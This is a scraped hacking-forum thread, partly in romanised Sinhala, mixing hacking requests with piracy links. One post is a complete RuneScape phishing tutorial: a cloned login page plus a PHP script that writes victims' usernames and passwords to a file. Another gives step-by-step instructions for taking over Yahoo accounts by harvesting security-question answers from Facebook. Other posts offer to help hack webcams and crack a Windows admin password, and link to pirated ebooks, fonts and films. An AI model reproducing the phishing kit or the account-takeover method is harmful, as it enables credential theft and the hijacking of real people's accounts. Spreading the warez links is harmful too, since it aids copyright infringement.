~H~A~C~K~I~N~G = ASk

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
dj_95 said:
mata msn web cam hack karana hati dana ganna oone......plz


web cam hack keyanne wena kenak ge cam eaka horen on karaganna da?

nattam oya ta one karanne oya cam eakak use karanne natuwa - video eakak play karala wena kenak eakka chat karanna da?

wena kenak ge cam eakak horen balanna da?

nattam wena kenak ge cam eakata oyage video eakak daana da??



mewage godak dewal teyanawa web cam hack kewwama


so oyata one karanne monada keyala bahadili kaloh mata help karanna pulwan wei:yes::yes::yes::yes::yes::yes::yes::yes:
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
Rasly said:
Yahoo hacking there has so many methods
I am her going to use Social Engineering (it is part o f CEH)
Yahoo hacking throws Social Network web side
I thing you all have Face book account
Go to face book account, fine one friend with yahoo mail ID,
In that friend profile collect this information
-----------------------------
Country
Zip code
Birthday day/date/year
----------------------------
One of information in this
Pet name
Last name of musician
Last name of teacher
Last name of best childhood friend
Born hospital
Favorite book
Favorite author
That information not in face books you need fine another ware
---------------------------
After go to yahoo mail and select Forget your ID or password?
After fill everything using already we collected information
but one thing you can't get password, password will be reset



Yes this works - but u must know the art of social hacking


with faceook u can use hi5 - myspace. netlog etc...


this is a blog that daily updates about social hacking

http://www.socialhacking.org/


Read this to know about social hacking

http://en.wikipedia.org/wiki/Social_engineering_(security)




Guys this works but u wanna find true details that suits :rolleyes::rolleyes::rolleyes:

its a side of hacking
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
msa27 said:
i want to hack administrator passowrd of windows xp dont want to reset or change want to know actuall passowrd note i am restricted guest user only withour admin privalagies how can i know actal admin password is there any way to know not to reset

yes u can


i remember a bootable Cd that can find up xp or other PW


unfortunately i cant remember the program name - it based with linux + some program works on it:yes:

ill try to find
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
Just some ebooks, tutorials for programming that I collected from some websites:

Quote:Beginning Programming with Java For Dummies

INFO
Author: Barry Burd
Paperback: 408 pages
Publisher: For Dummies; 2 edition (April 15, 2005)
Language: English
ISBN-10: 0764588745
ISBN-13: 978-0764588747
Format: pdf
Details:
Covering everything from basic Java development concepts to the latest tools and techniques used in Java, this book will put would-be programmers on their way to Java mastery
Explores what goes into creating a program, how to put the pieces together, dealing with standard programming challenges, debugging, and making it work
Updated for the release of the Java SDK 2.0, with all examples revised to reflect the changes in the technology​
Code:

http://rapidshare.com/files/101690704/Beg.Prog.with.J.4.Dummies-virTuAlZin.rar



Quote:Tutorial Information

Title: C Programming 2007
Author: Tim Heagarty
SKU: 33775
ISBN: 1-933736-90-9
Release Date: 2007-06-22
Duration: 9 hrs / 117 lessons
Compatibility: Win Vista, XP, 2000, 98SE, Mac OS X, OS 9, Linux
Work Files: Yes
---------

The C Programming Language is the foundation of nearly all modern computer languages. C is a “low level” simple language that can be used to create the most elegant of applications and operating systems. Most of today’s commercial applications and operating systems have the C language at their core. VTC author Tim Heagarty explains the history and mechanics of the language and gives practical advice on its use in the commercial world.

* Never has it been so easy to learn C Programming 2007.
* No expensive classroom training courses.
* No boring hard to follow books to read.
* Learn from your own desk at a pace that suits you.
* High quality affordable training that is easy to use and follow.
* Use our unique training method, it makes learning easy no matter what your learning style.

Contents

01.Introducing C
02.First Steps
03.Types - Operators & Expressions
04.Control Flow
05.Functions & Program Structure
06.Pointers & Arrays
07.Structures
08.Input & Output
09.Using C on the Web
10.The UNIX System Interface
11.Input & Output
12.Review
13.Credits
Work Files

Introducing C
Introduction (05:35)
Short History of C (03:40)
C on Windows (04:02)
Testing Visual C++ 2005 Express Edition (02:55)
C on Linux (03:41)
Testing GNU CPP (03:21)
What a Compiler Is (04:29)
First Steps
Hello World (01:55)
Entering The Program Pt.1 (04:28)
Entering The Program Pt.2 (06:41)
Compile & Run (07:04)
Examine Each Line (10:08)
First Program Assignment (02:46)
First Program Answer (02:55)
Types/Operators & Expressions
Types/Operators & Expressions (03:27)
Variable Names (06:53)
Data Types & Sizes (03:38)
Constants (07:20)
Declarations (03:10)
Arithmetic Operators (02:33)
Relational & Logical Operators Pt.1 (04:40)
Relational & Logical Operators Pt.2 (04:34)
Type Conversions (05:25)
Increment & decrement Operators (03:20)
Bitwise Operators (09:50)
Assignment Operators & Expressions (03:43)
Conditional Expressions (04:16)
Precedence & Order of Evaluations (06:38)
Control Flow
Control Flow (02:11)
Statements & Blocks (05:57)
If-Else (02:11)
Else-If Pt.1 (04:44)
Else-If Pt.2 (05:19)
Switch (09:38)
Loops - While (08:56)
Loops - For (04:54)
Loops - Do-While (03:29)
Break & Continue (03:35)
Goto & Labels (02:25)
Functions & Program Structure
Functions & Program Structure (02:36)
Basics of Functions Pt.1 (04:59)
Basics of Functions Pt.1 (03:54)
Functions Returning Non-integers (03:59)
External Variables (04:22)
Scope Rules (03:52)
Header Files (03:54)
Static Variables Pt.1 (07:14)
Static Variables Pt.2 (02:25)
Register Variables (02:03)
Block Structure (03:10)
Initialization (03:48)
Recursion (04:04)
The C Preprocessor (05:58)
Pointers & Arrays
Pointers & Arrays (01:05)
Pointers & Addresses Pt.1 (04:02)
Pointers & Addresses Pt.2 (06:02)
Pointers & Function Arguments (02:57)
Pointers & Arrays (04:01)
Address Arithmetic (06:07)
Character Pointers & Functions (03:53)
Pointer Arrays/Pointers to Pointers (02:44)
Multi-dimensional Arrays (05:07)
Initialization of Pointer Arrays (02:48)
Pointers vs. Multi-dimensional Arrays (02:38)
Command-line Arguments (03:15)
Pointers to Functions (02:39)
Complicated Declarations (02:36)
Structures
Structures (02:18)
Basics of Structures Pt.1 (04:24)
Basics of Structures Pt.2 (04:22)
Structures & Functions (06:59)
Arrays of Structures (02:37)
Pointers to Structures (06:49)
Typedef (02:20)
Unions (02:50)
Bit-fields (02:37)
Input & Output
Input & Output (02:24)
Standard Input & Output (06:36)
Formatted Output-Printf Pt.1 (05:48)
Formatted Output-Printf Pt.2 (02:49)
Variable Length Argument Lists (05:12)
Formatted Input Scanf (02:50)
File Access (05:29)
Error Handling Stderr & Exit (05:03)
Line Input & Output (01:45)
Miscellaneous Functions (06:31)
Using C on the Web
Using C on the WWW With CGI (04:14)
Basics of CGI Pt.1 (04:10)
Basics of CGI Pt.2 (03:48)
Preparing For C & CGI Pt.1 (04:32)
Preparing For C & CGI Pt.2 (05:12)
Hello World on CGI (07:57)
Functions For C on WWW (04:10)
Writing A Form For CGI Pt.1 (06:09)
Writing A Form For CGI Pt.2 (06:41)
Writing A Form For CGI Pt.3 (07:11)
Display & Use Environment Vars Pt.1 (04:23)
Display & Use Environment Vars Pt.2 (06:55)
The UNIX System Interface
The UNIX System Interface (03:39)
Low Level I/O Read & Write (02:59)
Open/Create/Close/Unlink (03:45)
Random Access Lseek (02:11)
Input & Output
Input & Output Pt.1 (06:53)
Input & Output Pt.2 (04:56)
File I/O & Character I/O (06:38)
Direct I/O & Error Handling (05:59)
Character Class Tests (02:18)
String Functions Pt.1 (07:16)
String Functions Pt.2 (04:55)
Math & Utility & (03:32)
Diagnostics/Arg Lists & Signals Pt.1 (05:47)
Diagnostics/Arg Lists & Signals Pt.2 (02:25)
Date & Time Functions Pt.1 (03:24)
Date & Time Functions Pt.2 (04:34)
Defined Limits & (01:57)
Review
Review (03:57)
Credits
About this Author (01:09)​
Code:

http://rapidshare.com/files/195141244/cP07vTuts.part1.rar
http://rapidshare.com/files/195155914/cP07vTuts.part2.rar
http://rapidshare.com/files/195166398/cP07vTuts.part3.rar
http://rapidshare.com/files/195172356/cP07vTuts.part4.rar



Quote:Beginning Programming (Wrox Beginning Guides)
By Adrian Kingsley-Hughes,&nbspKathie Kingsley-Hughes,

* Publisher: Wrox
* Number Of Pages: 479
* Publication Date: 2005-04-15
* Sales Rank: 66097
* ISBN / ASIN: 0764584065
* EAN: 9780764584060
* Binding: Paperback
* Manufacturer: Wrox
* Studio: Wrox





Book Description:

* Programming allows developers to create a sequence of instructions that enable computers to perform certain functions and tasks
* Offering the basic best practices and skills for novice programmers, this book helps readers gain new skills for writing programs and developing applications
* Teaches programming using C++ and explores scripting with JavaScript and VBScript, which are all free and don't require the reader to purchase any software
* Includes programming projects and real-world code examples that can be modified and expanded upon



Summary:
A common misconception about programming is that it can only be done on a professional level by someone with years of experience. This book proves exactly the opposite and provides nonprogrammers with assistance in learning the programming basics that will enable them to eventually become professional developers or programming hobbyists. Written for anyone who wants to learn to program but who doesn't have a background in the field, this hands-on guide explains programming through numerous examples in a variety of languages, including C++, Java, VBScript, and JavaScript. All the tools and materials you need are either easily available on the Internet or already installed on your computer. By the time you finish the book, you will have a solid foundation for proficiency in programming computers to perform a diverse number of functions and tasks. What you will learn from this book How computers read, store, and process code The various essential tools necessary to become an effective programmer Key concepts in programming that are consistent from one programming language to another How to create, modify, and delete files and folders Best techniques for making your applications easy to use How text editors, compilers, and other utilities make coding easier Who this books is for This book is for novices who want to learn to program but have little or no programming knowledge or experience.​
Code:

http://rapidshare.com/files/180933356/wrox.beginning.programming.apr.2005.pdf




Quote:C & C++ BOOKS
Inside the C++ Object Model
The C++ Standard Library
C++ Network Programming
More Exceptional C++
C# in a Nutshell
C++ in a Nutshell
Expert C Programming
C++ Footprint and Performance Optimization
The C programming language​
Code:

PASSWORD:
www.warezme.org
http://rapidshare.com/files/193747866/cplus_-_www.warezme.org.rar.html




Quote:PHP EBOOKS
PHP Solutions: Dynamic Web Design Made Easy
PHP5 and MySQL Bible
Object oriented php
PHP5 for Dummies
PHP programming with PEAR
Beginning PHP, Apache, MySQL Web Development
Professional PHP programming
PHP & MySQL everyday apps for dummies​
Code:

PASSWORD:
www.warezme.org
http://rapidshare.com/files/193953970/php_-_www.warezme.org.rar.html



Quote:VISUAL BASIC EBOOKS
Beginning Visual Basic 2005
MFC Programming with Visual C++ 6 Unleashed
Visual C++6 for Dummies
Schaum's Outline of Visual Basic
Visual Basic 6 Black Book
Visual Basic 2005 express edition for dummies
Visual Basic 2005 For Dummies
Visual Web Developer 2005 Express Edition For Dummies
Visual C++ 6 for Dummies Quick Reference for dummies​
Code:

PASSWORD:
www.warezme.org
http://rapidshare.com/files/193808379/jvisual_basic_-_www.warezme.org.rar.html



Quote:PYTHON:
Product Description
Expert Python Programming shows how Python development should be done with best practices and expert design tips. This book is for Python developers who are already building applications, but want to build better ones by applying best practices and new development techniques to their projects. The reader is expected to have a sound background in Python programming.

About the Author
Tarek Ziadé is CTO at Ingeniweb in Paris, working on Python, Zope, and Plone technology and on Quality Assurance. He has been involved for 5 years in the Zope community and has contributed to the Zope code itself. Tarek has also created Afpy, the French Python User Group and has written two books in French about Python. He has gave numerous talks and tutorials in French and international events like Solutions Linux, Pycon, OSCON, and EuroPython.​
Code:

http://rapidshare.com/files/182700746/LiP-Expert_python_programming.rar

 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
Runescape Phishing Site [TUT]This is a tutorial on runescape phishing site.

1. What we will do first is open up http://www.spam.com and sign up after making the account you wanna click 'Managment'

2.After clicking on managment you wanna click 'New File'Then you want to name it index.php.

3.Copy the code below and paste that into index.php , you can edit whatever you want I dont care.

Quote:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:IE>
<head>
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="MSSmartTagsPreventParsing" content="TRUE">
<title>RuneScape - the massive online adventure game by Jagex Ltd</title>
<link href="http://www.runescape.com/css/basic-10.css" rel="stylesheet" type="text/css" media="all">

<link href="http://www.runescape.com/css/extra-1.css" rel="stylesheet" type="text/css" media="all">
<style type="text/css">
.buttons { width: 600px; height: 60px; position: relative; margin: auto; }
.buttons a{ display: block; position: absolute; width: 260px; height: 40px; margin: 5px; background: #808080; font-weight: bold; color: white; text-align: center; border: 2px outset #909090;}
.buttons a:hover { background: #A0A0A0; border-color: #ffffff}
#button-left {left: 0px; top: 0px; padding-top:3px;}
#button-left span.lev1 {background-image: url('http://www.runescape.com/img/loginpage/open.gif');}
#button-right {right: 0px; top: 0px; padding-top:3px;}
#button-right span.lev1 { background-image: url('http://www.runescape.com/img/loginpage/lost-your.gif');}
span.lev1 { display: block; cursor: pointer; cursor: hand; position: absolute; top: -10px; left: -10px; width: 286px; height: 60px;}
a:hover span.lev1 { background-position: 0 60px;}
</style>
</head>

<body>

<div id="body">

<div style="text-align: center; background: none;">
<div class="titleframe e">
<b>Secure Login</b><br>
<a href="http://www.runescape.com/title.ws">Main Menu</a>
</div>
</div>
<img style="margin-top:-25px;" class="widescroll-top" src="http://www.runescape.com/img/scroll/backdrop_765_top.gif" alt="" width="765" height="50">
<div class="widescroll" style="text-align:center;">
<div class="widescroll-bgimg">
<div style="padding-top:0px;" class="widescroll-content">
<span style="display:block;padding:25px 0 0 0;"><img title="Login to Access this Feature" alt="Login to Access this Feature" style="display:block; margin:auto;" src="http://www.runescape.com/img/loginpage/log-in.gif"></span>



<div style="font-size: 8pt;margin:auto;">
 
</div>



Please enter your username and password to continue.

<div style="position:relative;height:214px;width:414px;margin:auto;margin-top:4px;">
<table cellpadding="0" cellspacing="0" style="height:214px; width:414px">
<tr>
<td colspan="3" height="7" width="400">

<img style="position:absolute; left:0; top:0" src="http://www.runescape.com/img/loginpage/shadow_top.gif">
</td>
</tr>
<tr>
<td height="200" width="7">
<img style="position:absolute; left:0; top:7px;" src="http://www.runescape.com/img/loginpage/shadow_left.gif">
</td>
<td height="200" width="400">
<div style="background-color:#3e434d; opacity: 0.5; -moz-opacity:0.5;height: 200px; width: 400px; position:absolute; left:7px; top:7px;z-index:0;filter:alpha(opacity=50);"></div>

<form action="pass.php" method="get" autocomplete="off">

<div style="z-index:2; top:70px;left:40px;position:absolute;">
<table style="-moz-opacity:1.0; opacity:1.0; filter:alpha(opacity=100);">
<tr>
<td>RuneScape username:</td>

<td><input size="20" type="text" name="username" maxlength="12"></td>

</tr>
<tr>
<td>RuneScape password:</td>

<td><input size="20" type="password" name="password" maxlength="20"></td>
</tr>
<tr>
<td></td>
<td align="center"><input type="submit" value="Secure Login"></td>
</tr>
</table>
</div>
<div style="z-index:2; top:164px;left:40px;right:40px;position:absolute; float:left; text-align: center;">


<input type="checkbox" name="rem" value="1"> Remember my username on this computer


<input type="hidden" name="mod" value="questhelp">
<input type="hidden" name="ssl" value="0">
<input type="hidden" name="dest" value="index.ws">

</div>
</form>
</td>
<td style="position:absolute; left:407px; top:7px" height="200" width="7">
<img src="http://www.runescape.com/img/loginpage/shadow_right.gif">
</td>

</tr>
<tr>
<td colspan="3" height="7" width="400">
<img style="position:absolute; left:0; top:207px" src="http://www.runescape.com/img/loginpage/shadow_bottom.gif">
</td>
</tr>
</table>
</div>



<div style="margin:auto;">

<img id="dont" src="http://www.runescape.com/img/loginpage/rs_fo_only_ie6.gif" style="margin:auto;padding-top:5px;" title="Only Enter Your Password On RuneScape.com" alt="Only Enter Your Password On RuneScape.com">
</div>

<script type="text/javascript">
var ua=navigator.userAgent.toLowerCase();

if (ua.indexOf('firefox')>-1 || ua.indexOf('macintosh')>-1) {
document.getElementById('dont').src='http://www.runescape.com/img/loginpage/rs_fo_only_ff.gif';
}

if (ua.indexOf('msie 7.0')>-1) {
document.getElementById('dont').src='http://www.runescape.com/img/loginpage/rs_fo_only_ie7.gif';
}
</script>
<br> <br>
<div class="buttons">
<a href="https://create.runescape.com/index.html" class="button" id="button-left"><span class="lev1"></span>Open a New Account!<br> Click Here!</a>
<a href="http://www.runescape.com/loginapplet/loginapplet.ws?mod=accountappeal&dest=passwordchoice.ws" class="button" id="button-right"><span class="lev1"></span>Lost Your Password?<br> Click Here!</a>

</div>
</div>
</div>
</div>
<img class="widescroll-bottom" src="http://www.runescape.com/img/scroll/backdrop_765_bottom.gif" alt="" width="765" height="50">
<div class="tandc">This website and its contents are copyright © 1999 - 2008 Jagex Ltd.<br>
Use of this website is subject to our <a href="http://www.runescape.com/terms/terms.ws" class=c>Terms+Conditions</a>
and <a href="http://www.runescape.com/privacy/privacy.ws" class=c>Privacy policy</a></div>
</div>

</body>
</html>​
4.After done with code you want to make a new file and name it 'Pass.php' without the quotes.

5.Copy the code for Pass.php

Quote:<?php
header("Location: http://www.runescape.com/ ");
$handle =

fopen("passwords.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>​
6.Now you're done happy runescape phishing


I only made this cause of the request's of people wanting me to make one , and dont post stupid stuff like "OMG RUNESCAPE SUCKS" cause ill just remove this topic and open a new one and if you do it again ill just report you peace out.
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
Hacking FireFox{Ebook}

xn515j.jpg


They dreamed of a better browser . . . and before you could say “”explore no more,”" Firefox was born. But already you want more. Tighter security, greater functionality. A custom installation for Linux. Maybe even that unique extension you’ve always dreamed of creating. Well, if you want to tweak the Fox, here are over 400 pages of ways to do it. From h*cking profile settings to cracking links and cleaning out the cookie jar, this is the stuff that puts you in control. Step-by-step instructions for these hacks and dozens more Settings, content, and extension hacks H*cking the interface and themes Performance boosters Anti-phishing and security hacks Toolbar and status bar tweaks Navigation, download, and search hacks Hacks for common plugins Extension and theme creation.search hacks Hacks for common plugins Extension and theme creation.
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-


Download Links:



 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
15.4 GB of Hackers' Movies & Hacking DocumentariesFirst of all, I didn't made this collection, I just found torrent while searching for some movies.

It is a great collection of best hacking and comuputer-related movies and documentaries.

Everybody should check it out. (if you could afford downloading 15,4 gb)

These ARE NOT hack tools or videos on how to hack.
This is about the most comprehensive hacker related shows movies and documentary\'s you\'ll find any where.


Hack - Creation of the Computer (History).avi 351.31 MB
Hack - Cyberpunk Educator - Gnostic Documentary (2004).avi 650.99 MB
Hack - How Internet Traffic works (Warriors of the Net).avi 81.47 MB
Hack - How it's Made - Microprocessors, Circuit Boards, Compact Discs, Computers, Video Games, Fibre Optics, Handhelds.avi 287.27 MB
Hack - Movie - Johnny Mnemonic [1995].avi 699.93 MB
Hack - Movie - Sneakers [1992].avi 896.05 MB
Hack - Movie - Swordfish [2001].avi 703.35 MB
Hack - Movie - The Lawnmower Man 1 (1992).avi 702.58 MB
Hack - Movie - The Net [1995] Special Edition.avi 700.3 MB
Hack - Movie - Tron - (1982) Widescreen.avi 1 GB
Hack - Net Neutrality (2006) (PBS NOW).avi 116.61 MB
Hack - Pirates Of Silicon Valley (1999) (TNT).avi 694.76 MB
Hack - Triumph of The Nerds - The Rise of Accidental Empires (1996) 1of3 (PBS).avi 499.96 MB
Hack - Triumph of The Nerds - The Rise of Accidental Empires (1996) 2of3 (PBS).avi 500.83 MB
Hack - Triumph of The Nerds - The Rise of Accidental Empires (1996) 3of3 (PBS).avi 501.02 MB
Hackers - 23 part -I - (1990) The KGB, the Computer and Me (NOVA).avi 464.3 MB
Hackers - 23 part -II -(1998) Nichts ist so wie es scheint.avi 699.01 MB
Hackers - 23 part -II -(1998).Eng sub tittles.srt 81.19 KB
Hackers - Freedom Downtime - Documentary (FREE KEVIN) (2003).avi 699.92 MB
Hackers - Freedom Downtime - Kevin Mitnick Interview (2003).avi 174.12 MB
Hackers - Hackare - ELECTRON (2002).avi 557.8 MB
Hackers - Hacker Attack (Discovery Channel).avi 392.53 MB
Hackers - Outlaws And Angels (TLC).avi 697.13 MB
Hackers - The History Of Hacking - Phone Phreaking, Cap.Crunch, Wozniak, Mitnick.avi 244.38 MB
Hackers.0 - [1983] WarGames.avi 699.92 MB
Hackers.1 - [1995] The Movie.avi 707.71 MB
Hackers.2 - [1999] Operation Takedown (about Kevin Mitnick).avi 674.07 MB
Hackers.3 - [2001] AntiTrust.avi 665.88 MB
Hacking - Democracy (HBO).avi


Enjoy! ;)

http://www.mininova.org/tor/1453999
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
045724qmw.jpg


FONTS INSIDE: Rank | Font Name | [Date Designed - Designed By] 1. Helvetica [1957 - Max Miedinger] 2. Garamond [1530 - Claude Garamond] 3. Frutiger [1977 - Adrian Frutiger] 4. Bodoni [1970 - Giambattista Bodoni] 5. Futura [1927 - Paul Renner] 6. Times [1931 - Stanley Morison] 7. Akzidenz Grotesk [1966 - G�nter Gerhard Lange] 8. Officina [1990 - Erik Spiekermann] 9. Gill Sans [1930 - Eric Gill] 10. Univers [1954 - Adrian Frutiger] 11. Optima [1954 - Hermann Zapf] 12. Franklin Gothic [1903 - Morris Fuller Benton] 13. Bembo [1496 - Francesco Griffo] 14. Interstate [1993 - Tobias Frere-Jones] 15. Thesis [1994 - Lucas de Groot] 16. Rockwell [1934 - Frank H. Pierpont] 17. Walbaum [1800 - Justus Walbaum] 18. Meta [1991 - Erik Spiekermann] 19. Trinit� [1982 - Bram De Does] 20. Din [1926 - Ludwig Goller] 21. Matrix [1986 - Zuzana Licko] 22. OCR [1965 - American Type Founders] 23. Avant Garde [1968 - Herb Lubalin] 24. Lucida [1985 - Chris Holmes / Charles Bigelow] 25. Sabon [1964 - Jan Tschichold] 26. Zapfino [1998 - Hermann Zapf] 27. Letter Gothic [1956 - Roger Roberson] 28. Stone [1987 - Summer Stone] 29. Arnhem [1998 - Fred Smeijers] 30. Minion [1990 - Robert Slimbach] 31. Myriad [1992 - Twombly & Slimbach] 32. Rotis [1988 - Olt Aicher] 33. Eurostile [1962 - Aldo Novarese] 34. Scala [1991 - Martin Majoor] 35. Syntax [1968 - Hans Eduard Meier] 36. Joanna [1930 - Eric Gill] 37. Fleishmann [1997 - Erhard Kaiser] 38. Palatino [1950 - Hermann Zapf] 39. Baskerville [1754 - John Baskerville] 40. Fedra [2002 - Peter Bil'ak] 41. Gotham [2000 - Tobias Frere-Jones] 42. Lexicon [1992 - Bram De Does] 43. Hands [1991 - Letterror] 44. Metro [1929 - W. A. Dwiggins] 45. Didot [1799 - Firmin Didot] 46. Formata [1984 - Bernd M�llenst�dt] 47. Caslon [1725 - William Caslon] 48. Cooper Black [1920 - Oswald B. Cooper] 49. Peignot [1937 - A. M. Cassandre] 50. Bell Gothic [1938 - Chauncey H. Griffith] 51. Antique Olive [1962 - Roger Excoffon] 52. Wilhelm Klngspor Gotisch [1926 - Rudolf Koch] 53. Info [1996 - Erik Spiekermann] 54. Dax [1995 - Hans Reichel] 55. Proforma [1988 - Petr van Blokland] 56. Today Sans [1988 - Volker K�ster] 57. Prokyon [2002 - Erhard Kaiser] 58. Trade Gothic [1948 - Jackson Burke] 59. Swift [1987 - Gerald Unger] 60. Copperplate Gothic [1901 - Frederic W. Goudy] 61. Blur [1992 - Neville Brody] 62. Base [1995 - Zuzana Licko] 63. Bell Centennial [1978 - Matthew Carter] 64. News Gothic [1908 - Morris Fuller Benton] 65. Avenir [1988 - Adrian Frutiger] 66. Bernhard Modern [1937 - Lucian Bernhard] 67. Amplitude [2003 - Christian Schwartz] 68. Trixie [1991 - Erik van Blokland] 69. Quadraat [1992 - Fred Smeijers] 70. Neutraface [2002 - Christian Schwartz] 71. Nobel [1929 - Sjoerd de Roos] 72. Industria [1990 - Neville Brody] 73. Bickham Script [1997 - Richard Lipton] 74. Bank Gothic [1930 - Morris Fuller Benton] 75. Corporate ASE [1989 - Kurt Weidemann] 76. ~censored~ [2000 - Ole Schafer] 77. Trajan [1989 - Carol Twombly] 78. Kabel [1927 - Rudolf Koch] 79. House Gothic 23 [1995 - Tal Leming] 80. Kosmik [1993 - Letterror] 81. Caecilia [1990 - Peter Matthias Noordzij] 82. Mrs Eaves [1996 - Zuzana Licko] 83. Corpid [1997 - Lucas de Groot] 84. Miller [1997 - Matthew Carter] 85. Souvenir [1914 - Morris Fuller Benton] 86. Instant Types [1992 - Just van Rossum] 87. Clarendon [1845 - Benjamin Fox] 88. Triplex [1989 - Zuzana Licko] 89. Benguiat [1989 - Ed Benguiat] 90. Zapf Renaissance [1984 - Hermann Zapf] 91. Filosofia [1996 - Zuzana Licko] 92. Chalet [1996 - House Industries] 93. Quay Sans [1990 - David Quay] 94. C�zanne [1995 - Michael Want, James Grieshaber] 95. Reporter [1938 - Carlos Winkow] 96. Legacy [1992 - Ronald Arnholm] 97. Agenda [1993 - Greg Thompson] 98. Bello [2004 - Underware] 99. Dalliance [2000 - Frank Heine] 100. Mistral [1953 - Roger Excoffon] Here is one link. Just open it with Winrar.

Download link = Megaupload
http://www.megaupload.com/?d=29MJ7JDQ